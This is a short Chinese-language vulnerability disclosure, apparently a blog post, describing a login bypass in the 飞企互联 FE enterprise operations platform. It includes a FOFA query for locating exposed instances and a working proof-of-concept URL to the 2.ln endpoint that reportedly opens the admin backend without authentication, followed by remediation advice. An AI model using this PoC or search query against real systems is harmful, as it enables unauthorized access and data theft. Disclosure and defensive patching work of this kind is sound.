0x01 产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。

0x02 漏洞概述

飞企互联-FE企业运营管理平台 2.ln接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。

0x03 复现环境

FOFA:app="飞企互联-FE企业运营管理平台"

0x04 漏洞复现

PoC

http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056

直接拼接url即可进入后台

2023-12-28T00:41:09.png

0x05 修复建议

关闭或删除相关接口

升级至安全版本

最后修改:2023 年 12 月 28 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏